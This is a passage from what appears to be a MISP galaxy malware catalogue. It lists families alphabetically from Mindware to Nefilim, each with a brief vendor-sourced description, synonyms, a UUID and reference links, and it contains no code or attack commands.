Metadata key	Value
type	[]

Mindware

Ransomware, potential rebranding of win.sfile.

Internal MISP references

UUID cfd0ab21-12e6-4c95-acc7-a8f488ed1706 which can be used as unique global reference for Mindware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MINEBRIDGE

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MINEBRIDGE.

Known Synonyms
`GazGolder`

Internal MISP references

UUID 663d4310-51ea-4ac1-9426-b9e9c5210471 which can be used as unique global reference for MINEBRIDGE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MiniASP

Internal MISP references

UUID a4f8bacf-2076-4e00-863c-874cdd833a41 which can be used as unique global reference for MiniASP in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MINIBIKE

According to Mandiant, this is a custom backdoor that provides a more flexible code-execution interface and enhanced reconnaissance features compared to MINIBIKE.

Internal MISP references

UUID 6ac94abf-1fc0-459d-8ffd-81cdd12b7a31 which can be used as unique global reference for MINIBIKE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

miniBlindingCan

miniBlindingCan is an HTTP(S) orchestrator.

It is a variant of the BlindingCan RAT, having the same command parsing logic, but supporting only a small subset of commands available previously. The main operations are the update of the malware configuration, and the download and execution of additional payloads from the attackers' C&C.

The miniBlindingCan malware was used in Operation DreamJob attacks against aerospace and media companies in Q2-Q3 2022.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular miniBlindingCan.

Known Synonyms
`AIRDRY.V2`
`EventHorizon`

Internal MISP references

UUID d266693e-0564-47e7-93ac-128d491efcab which can be used as unique global reference for miniBlindingCan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MINIBUS

According to Mandiant, this is a custom backdoor that provides a more flexible code-execution interface and enhanced reconnaissance features compared to MINIBIKE.

Internal MISP references

UUID eac92334-6af5-4d19-80b6-80abe5580afb which can be used as unique global reference for MINIBUS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MiniDuke

The MiniDuke toolset consists of multiple downloader and backdoor components

Internal MISP references

UUID 3d164ab8-58a5-433c-bbc9-b81a869ac8c8 which can be used as unique global reference for MiniDuke in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MiniStealer

Internal MISP references

UUID 01e605b0-aadc-40a3-986f-f0795fd20401 which can be used as unique global reference for MiniStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

miniTypeFrame

miniTYPEFRAME is a variant of TYPEFRAME, a RAT for Windows.

Its functionality is reduced to serve mostly as a proxy module. Its commands are indexed by 16-bit integers, usually in the range 0x8027–0x8044.

Internal MISP references

UUID fbf135fa-1194-4532-846a-eb1716e0b426 which can be used as unique global reference for miniTypeFrame in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MintStealer

Internal MISP references

UUID 15c036d3-e1d8-4e4a-850c-20ce65bdd24c which can be used as unique global reference for MintStealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mirage

Internal MISP references

UUID 6f6da371-2d62-4245-9aa3-8570e39222ae which can be used as unique global reference for Mirage in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MirageFox

Internal MISP references

UUID b3e89b03-c5af-41cd-88b8-e15335abbb30 which can be used as unique global reference for MirageFox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mirai (Windows)

Internal MISP references

UUID 2edd3051-b1b5-47f2-9155-8c97f791dfb7 which can be used as unique global reference for Mirai (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MirrorBlast

According to Minerva Labs, MirrorBlast malware is a trojan that is known for attacking users’ browsers. It usually pretends to be a legitimate browser add-on however it has now evolved additional capabilities, whereby other malwares are installed simultaneously. Recently, this trojan is thought to have tentative links to TA505 and PYSA groups.

Internal MISP references

UUID be347289-5ca5-4b49-b5ef-8443883736c1 which can be used as unique global reference for MirrorBlast in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MirrorKey

According to Trend Micro, this is a loader for win.transbox, used by threat actor Earth Yako.

Internal MISP references

UUID 7340174e-3ff7-4293-acd0-1a82433a7777 which can be used as unique global reference for MirrorKey in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Misdat

Internal MISP references

UUID d1597713-fe7a-45bd-8b59-1a13c7e097d8 which can be used as unique global reference for Misdat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Misfox

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Misfox.

Known Synonyms
`Dromedan`
`MixFox`
`ModPack`

Internal MISP references

UUID b4c33277-ec15-4bb3-89ef-314ecfa100da which can be used as unique global reference for Misfox in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox - webarchive

Associated metadata

Metadata key	Value
type	[]

Misha

Undocumented information stealer targeting multiple browsers and cryptocurrences. Internal project name appears to be "misha".

Internal MISP references

UUID 3f32d0bf-61b9-495b-88ca-77f4a254336d which can be used as unique global reference for Misha in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mispadu

According to ESET Research, Mispadu is an ambitious Latin American banking trojan that utilizes McDonald’s malvertising and extends its attack surface to web browsers. It is used to target the general public and its main goals are monetary and credential theft. In Brazil, ESET has seen it distributing a malicious Google Chrome extension that attempts to steal credit card data and online banking data, and that compromises the Boleto payment system.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mispadu.

Known Synonyms
`URSA`

Internal MISP references

UUID ffc9ffcc-24f4-4e60-ab02-a75b007359fa which can be used as unique global reference for Mispadu in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MISTCLOAK

Mandiant associates this with UNC4191, this malware decrypts and runs DARKDEW.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MISTCLOAK.

Known Synonyms
`HIUPAN`

Internal MISP references

UUID 1e6bc052-73de-453d-ba6c-658c82fe21d4 which can be used as unique global reference for MISTCLOAK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MISTYVEAL

Internal MISP references

UUID d594d6c1-6d10-4fe8-acda-397df91c73ba which can be used as unique global reference for MISTYVEAL in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Miuref

Internal MISP references

UUID 4c786624-4a55-46e6-849d-b65552034235 which can be used as unique global reference for Miuref in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref - webarchive

Associated metadata

Metadata key	Value
type	[]

MMON

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MMON.

Known Synonyms
`Kaptoxa`

Internal MISP references

UUID a6d12f4f-57f6-4873-9c68-e079fef5e5fb which can be used as unique global reference for MMON in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MM Core

Internal MISP references

UUID 6363cc2f-08f1-47a0-adbf-5cf19ea89ffd which can be used as unique global reference for MM Core in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.mm_core - webarchive

Associated metadata

Metadata key	Value
type	[]

MobiRAT

Internal MISP references

UUID e33aa1f8-a631-4274-afe0-f2fd3426332e which can be used as unique global reference for MobiRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mocky LNK

LNK files used to lure and orchestrate execution of various scripts, interacting with the Mocky API service.

Internal MISP references

UUID 0eb52072-a2db-4689-bc2d-ac0ae65bdd8c which can be used as unique global reference for Mocky LNK in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mocton

Internal MISP references

UUID 7132c1de-9a3f-4f08-955f-ab6f7a09e17d which can be used as unique global reference for Mocton in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton - webarchive

Associated metadata

Metadata key	Value
type	[]

ModernLoader

According to PCrisk, ModernLoader, also known as Avatar Bot and AvatarLoader, is a malicious program that has minimalistic loader and RAT (Remote Access Trojan) functionalities.

Loader-type malware is designed to infect devices with additional malicious programs, while RATs enable remote access/control over infected machines. ModernLoader is capable of executing basic commands and injecting malicious modules into systems.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ModernLoader.

Known Synonyms
`AvatarBot`

Internal MISP references

UUID a3932600-e1fd-4fbe-b651-8da31109ee15 which can be used as unique global reference for ModernLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MoDi RAT

Internal MISP references

UUID 1f36d78b-6f3d-469e-8a60-5ecaebe9d80a which can be used as unique global reference for MoDi RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ModPipe

ModPipe is point-of-sale (POS) malware capable of accessing sensitive information stored in devices running ORACLE MICROS Restaurant Enterprise Series (RES) 3700 POS – a management software suite used by hundreds of thousands of bars, restaurants, hotels and other hospitality establishments worldwide. ModPipe uses modular architecture consisting of basic components and downloadable modules. One of them – named GetMicInfo – contains an algorithm designed to gather database passwords by decrypting them from Windows registry values. Exfiltrated credentials allow ModPipe's operators access to database contents, including various definitions and configuration, status tables and information about POS transactions.

Internal MISP references

UUID a4b3d07a-b3ce-4128-9c5c-caa218518a00 which can be used as unique global reference for ModPipe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

ModPOS

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ModPOS.

Known Synonyms
`straxbot`

Internal MISP references

UUID 026d638b-cc51-4eff-97fc-d61215a1a70a which can be used as unique global reference for ModPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mofksys

Internal MISP references

UUID 818a9036-a74f-4017-af07-cba9a471b316 which can be used as unique global reference for Mofksys in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Moisha Ransomware

Internal MISP references

UUID 16c5d8f9-c2f1-4599-bc93-bc02497deff8 which can be used as unique global reference for Moisha Ransomware in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Moker

Internal MISP references

UUID 90a1a61e-3e69-4b92-ac11-9095ac2d9cf4 which can be used as unique global reference for Moker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mokes (Windows)

Internal MISP references

UUID 3a711d44-2a70-418d-92c1-692c3d3b13c2 which can be used as unique global reference for Mokes (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mole

Internal MISP references

UUID aaeaf9ee-2f3d-4141-9d45-ec383ba8445f which can be used as unique global reference for Mole in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MoleNet

MoleNet is a .NET downloader malware used by the Molerats group in targeted attacks in the Middle East. Before downloading additional payloads, it first collects information about the infected machine using WMI queries and sends the data to its operators. It was first discovered in 2020, however, Cybereason researchers showed that it has been in use since at least 2019, with infrastructure that operated since 2017.

Internal MISP references

UUID 76842aa1-f06d-49cf-90df-158346525f91 which can be used as unique global reference for MoleNet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Molerat Loader

Internal MISP references

UUID b50408c3-6676-4d3f-8a97-9114c215b67a which can be used as unique global reference for Molerat Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Monero Miner

According to ESET, first seen in-the-wild on 26th May, 2017, the malicious mining software is a fork of a legitimate open source Monero CPU miner called xmrig.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Monero Miner.

Known Synonyms
`CoinMiner`

Internal MISP references

UUID c57a4168-cd09-4611-a665-bbcede80f42b which can be used as unique global reference for Monero Miner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Money Message

A new ransomware gang hitting companies in worldwide firstly spotted by Zscaler.

Internal MISP references

UUID 07dff193-2fad-4de6-83ad-046c6b95be46 which can be used as unique global reference for Money Message in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

mongall

Internal MISP references

UUID e0627961-fc28-4b7d-bb44-f937defa052a which can be used as unique global reference for mongall in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MontysThree

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MontysThree.

Known Synonyms
`MT3`

Internal MISP references

UUID 8a6013a1-5e5c-41f5-bd8e-c86ea7f108d9 which can be used as unique global reference for MontysThree in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MoonBounce

MoonBounce is a malware embedded into a modified UEFI firmware. Placed into SPI flash, it can provide persistence across full reinstall and even disk replacements. MoonBounce deploys user-mode malware through in-memory staging with a small footprint.

Internal MISP references

UUID 04ce84dc-f471-48b6-8456-348cd85af39f which can be used as unique global reference for MoonBounce in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MoonPeak

According to Cisco Talos, this RAT is derived from the open source XenoRAT.

Internal MISP references

UUID 47d27d87-0d5c-4761-a2a2-43982abb4d45 which can be used as unique global reference for MoonPeak in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MOONTAG

The malware, potentially named "MOON_TAG" by its developer as indicated by the strings within, is derived from code shared in a Google Group (https://groups.google.com/g/ph4nt0m/c/2J3_1XPeKD8/m/AYPoWudRcTAJ?pli=1). Each variant discovered possesses capabilities to communicate via the Microsoft Graph API. At this moment, it appears to be in development.

Internal MISP references

UUID 391c5173-8ca3-4f1b-8b34-a1eb0b21ea15 which can be used as unique global reference for MOONTAG in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MoonWalk

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MoonWalk.

Known Synonyms
`CurveLast`
`SneakCross`

Internal MISP references

UUID 6a0ce908-d535-4973-bc49-33b9869de99b which can be used as unique global reference for MoonWalk in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MoonWind

Internal MISP references

UUID 8465177f-16c8-47fc-a4c8-f4c0409fe460 which can be used as unique global reference for MoonWind in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MoriAgent

Internal MISP references

UUID 3de9ccf5-4756-4c5b-9086-6664f5a9b761 which can be used as unique global reference for MoriAgent in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Moriya

This tool is a passive backdoor which allows attackers to inspect all incoming traffic to the infected machine, filter out packets that are marked as designated for the malware and respond to them. This forms a covert channel over which attackers are able to issue shell commands and receive back their outputs.

Internal MISP references

UUID 4dd511a6-be5f-40ae-9a9f-aaf354f7ea2e which can be used as unique global reference for Moriya in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Morphine

Internal MISP references

UUID 9de41613-7762-4a88-8e9a-4e621a127f32 which can be used as unique global reference for Morphine in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.morphine - webarchive

Associated metadata

Metadata key	Value
type	[]

MortalKombat

Internal MISP references

UUID ff3b11e4-3450-4db5-a2ed-5c45cd875330 which can be used as unique global reference for MortalKombat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mortis

Internal MISP references

UUID 354212b6-86df-4dcc-87b4-97f6e78b6a41 which can be used as unique global reference for Mortis in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Morto

Internal MISP references

UUID c931dc7d-9373-4545-911c-ad5589670c40 which can be used as unique global reference for Morto in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MosaicRegressor

Internal MISP references

UUID 45e780f0-aa06-4427-8393-ef1d358e354f which can be used as unique global reference for MosaicRegressor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Moserpass

Internal MISP references

UUID 0dc319a2-96b5-420d-85ec-07f34f457402 which can be used as unique global reference for Moserpass in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mosquito

Internal MISP references

UUID 663df641-d396-4e93-93bd-bb9609ceb0ba which can be used as unique global reference for Mosquito in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mount Locker

According to BlackBerry, MountLocker is a Ransomware-as-a-Service (RaaS), active since July 2020 The MountLocker ransomware was updated during early November 2020 to broaden the targeting of file types and evade security software. Victim’s files are encrypted using ChaCha20, and file encryption keys are encrypted using RSA-2048. The ransomware appears to be somewhat secure; there are no trivial weaknesses allowing for easy key recovery and decryption of data. MountLocker does however use a cryptographically insecure method for key generation that may be prone to attack.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Mount Locker.

Known Synonyms
`DagonLocker`
`MountLocker`
`QuantumLocker`

Internal MISP references

UUID b5814e05-532a-4262-a8da-82fd0d7605ee which can be used as unique global reference for Mount Locker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Moure

Internal MISP references

UUID bd3468e4-5e00-46e6-a884-6eda1b246394 which can be used as unique global reference for Moure in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.moure - webarchive

Associated metadata

Metadata key	Value
type	[]

mozart

According to PCrisk, Mozart is malicious software that allows attackers (cyber criminals) to execute various commands on an infected computer through the DNS protocol. This communication method helps cyber criminals to avoid detection via security software. Mozart is categorized as a malware loader and executes commands that cause download and installation of malicious software.

Internal MISP references

UUID dde61acb-8c0f-4a3a-8450-96e233f2ddc1 which can be used as unique global reference for mozart in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MPKBot

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MPKBot.

Known Synonyms
`MPK`

Internal MISP references

UUID 2363dc9f-822a-4581-8d5f-1fc436e70621 which can be used as unique global reference for MPKBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MQsTTang

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MQsTTang.

Known Synonyms
`QMAGENT`

Internal MISP references

UUID aed28126-b8ab-4ab5-a2c6-89898fe689c9 which can be used as unique global reference for MQsTTang in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MRAC

Ransomware.

Internal MISP references

UUID 3eee33df-76c5-4962-ac35-b0d98c37a81a which can be used as unique global reference for MRAC in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MrDec

Ransomware.

Internal MISP references

UUID 1e301d67-cd12-4f46-bcb3-c60f9b78c4d0 which can be used as unique global reference for MrDec in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MrPeter

Internal MISP references

UUID 677123aa-3a1a-4443-a968-4f6f4bc6b3c2 which can be used as unique global reference for MrPeter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Msupedge

Internal MISP references

UUID 284136d0-5ece-40f1-bab7-c066604cd80c which can be used as unique global reference for Msupedge in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MuddyC2Go

Internal MISP references

UUID c22da013-96f4-4dfa-ab24-544da231500e which can be used as unique global reference for MuddyC2Go in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MulCom

Internal MISP references

UUID a756ad8a-ac29-49c0-aee8-f3030e7ddeca which can be used as unique global reference for MulCom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Multigrain POS

Internal MISP references

UUID c513c490-7c76-42ab-a51f-cc780faa7146 which can be used as unique global reference for Multigrain POS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

murkytop

a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.

Internal MISP references

UUID 2685ea45-06f4-46e0-9397-eff8844db855 which can be used as unique global reference for murkytop in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Murofet

According to bin.re, Murofet, also called LICAT, is a member of the ZeuS family. It uses a Domain Generation Algorithm (DGA) to determine the current C2 domain names.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Murofet.

Known Synonyms
`Licat`

Internal MISP references

UUID f7081626-130a-48d5-83a9-759b3ef198ec which can be used as unique global reference for Murofet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mutabaha

Internal MISP references

UUID 771113e1-8550-4dc2-b2ad-7298ae381cb5 which can be used as unique global reference for Mutabaha in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MyDogs

Internal MISP references

UUID 77d74e8c-664a-42b7-a55d-735ea138a898 which can be used as unique global reference for MyDogs in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MyDoom

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MyDoom.

Known Synonyms
`Mimail`
`Novarg`

Internal MISP references

UUID ac3483f9-522e-4fbc-b072-e5f76972e7b3 which can be used as unique global reference for MyDoom in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MyKings Spreader

Internal MISP references

UUID ec9b2bf4-1c0b-4f3c-aaa6-909b19503eed which can be used as unique global reference for MyKings Spreader in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader - webarchive
http://download.ahnlab.com/kr/site/library/[AhnLab]Analysis%20Report_MyKings%20Botnet.pdf
https://decoded.avast.io/janrubin/the-king-is-dead-long-live-mykings/ - webarchive
https://www.proofpoint.com/us/threat-insight/post/smominru-monero-mining-botnet-making-millions-operators - webarchive
https://sophos.files.wordpress.com/2019/12/mykings_report_final.pdf - webarchive
http://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/ - webarchive
https://blog.talosintelligence.com/2020/07/valak-emerges.html - webarchive

Associated metadata

Metadata key	Value
type	[]

MyloBot

According to PCrisk, MyloBot is a high-risk trojan-type virus that allows cyber criminals to control the infected machine. MyloBot can be considered as a botnet, since all infected computers are connected to a single network. Depending on cyber criminals' goals, infected machines might be misused or have additional infections applied.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MyloBot.

Known Synonyms
`FakeDGA`
`WillExec`

Internal MISP references

UUID 98d375cb-f940-4bc7-a61e-f47bdcdc48e2 which can be used as unique global reference for MyloBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MysterySnail

Internal MISP references

UUID c9b5b0b2-45af-43f2-8eb4-e13493c1342e which can be used as unique global reference for MysterySnail in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Mystic Stealer

According to ZScaler, a new information stealer that was first advertised in April 2023, capable of stealing credentials from nearly 40 web browsers and more than 70 browser extensions, also targeting cryptocurrency wallets, Steam, and Telegram. The code is heavily obfuscated making use of polymorphic string obfuscation, hash-based import resolution, and runtime calculation of constants. Mystic implements a custom binary protocol that is encrypted with RC4.

Internal MISP references

UUID 226a9241-e4de-49d0-bb30-4550221f3f9f which can be used as unique global reference for Mystic Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

MZRevenge

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular MZRevenge.

Known Synonyms
`MaMo434376`

Internal MISP references

UUID 5cb1091c-bfe7-440c-a8c7-b652e205e65b which can be used as unique global reference for MZRevenge in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

N40

Botnet with focus on banks in Latin America and South America. Relies on DLL Sideloading attacks to execute malicious DLL files. Uses legitimate VMWare executable in attacks. As of March 2019, the malware is under active development with updated versions coming out on persistent basis.

Internal MISP references

UUID 6f0109a5-7cec-4a49-8b27-e18ad5c6cae6 which can be used as unique global reference for N40 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nabucur

Internal MISP references

UUID ddf63295-cdba-4c70-a4c6-623ba2b5e6dd which can be used as unique global reference for Nabucur in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.nabucur - webarchive

Associated metadata

Metadata key	Value
type	[]

NACHOCHEESE

According to FireEye, NACHOCHEESE is a command-line tunneler that accepts delimited C&C IPs or domains via command-line and gives actors shell access to a victim's system.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NACHOCHEESE.

Known Synonyms
`Cyruslish`
`TWOPENCE`
`VIVACIOUSGIFT`

Internal MISP references

UUID abd22cec-49ee-431f-a2e6-e4722b3e44bb which can be used as unique global reference for NACHOCHEESE in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nagini

Internal MISP references

UUID 0ec7d065-3418-43ba-a0cc-1e06471893ad which can be used as unique global reference for Nagini in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Naikon

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Naikon.

Known Synonyms
`Sacto`

Internal MISP references

UUID dfb745f1-600a-4d31-a3b0-57bd0a72ac2e which can be used as unique global reference for Naikon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nanocore RAT

Nanocore is a Remote Access Tool used to steal credentials and to spy on cameras. It as been used for a while by numerous criminal actors as well as by nation state threat actors.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nanocore RAT.

Known Synonyms
`Nancrat`
`NanoCore`

Internal MISP references

UUID f9aa9004-8811-4091-a471-38f81dbcadc4 which can be used as unique global reference for Nanocore RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NanoLocker

Internal MISP references

UUID 00e1373c-fddf-4b06-9770-e980cc0ada6b which can be used as unique global reference for NanoLocker in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.nano_locker - webarchive

Associated metadata

Metadata key	Value
type	[]

NAPLISTENER

Internal MISP references

UUID c5a291c8-c317-48b4-aad1-d5e9d68c2fc5 which can be used as unique global reference for NAPLISTENER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Narilam

Internal MISP references

UUID f5a262c7-59ed-42d1-884d-f8d29acf353f which can be used as unique global reference for Narilam in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nautilus

Internal MISP references

UUID d8295eba-60ef-4900-8091-d694180de565 which can be used as unique global reference for Nautilus in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NavRAT

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NavRAT.

Known Synonyms
`JinhoSpy`

Internal MISP references

UUID ec0cad2c-0c13-491a-a869-1dc1758c8872 which can be used as unique global reference for NavRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

nccTrojan

Internal MISP references

UUID 85056c54-f8f1-4a98-93cb-322cc1deb52c which can be used as unique global reference for nccTrojan in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nebulae

Internal MISP references

UUID 76c75ed0-95ba-4393-8020-4400bdc49de6 which can be used as unique global reference for Nebulae in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Neconyd

Internal MISP references

UUID fbc29921-6ec4-4cae-b45c-b7d210ffd435 which can be used as unique global reference for Neconyd in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Necurs

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Necurs.

Known Synonyms
`nucurs`

Internal MISP references

UUID 53ad08a6-cca9-401a-a6da-3c0bff2890eb which can be used as unique global reference for Necurs in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

NedDnLoader

NedDnLoader is an HTTP(S) downloader that uses AES for C&C trafic encryption.

It sends detailed information about the victim's environment, like computer name, user name, type and free disk space of all drives, and a list of currently running processes. It uses three typical parameter names for HTTP POST requests: ned, gl, hl. The usual payload downloaded with NedDnLoader is Torisma.

The internal DLL name of NedDnLoader is usually Dn.dll, Dn64.dll or DnDll.dll. It is deployed either as a standalone payload or within a trojanized MFC application project. It contains specific RTTI symbols like ".?AVCWininet_Protocol@@" or ".?AVCMFC_DLLApp@@".

Internal MISP references

UUID f061ad00-c215-478e-ae31-77fcdc2f4963 which can be used as unique global reference for NedDnLoader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Nefilim

According to Vitali Kremez and Michael Gillespie, this ransomware shares much code with Nemty 2.5. A difference is removal of the RaaS component, which was switched to email communications for payments. Uses AES-128, which is then protected RSA2048.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Nefilim.

Known Synonyms
`Nephilim`

Internal MISP references

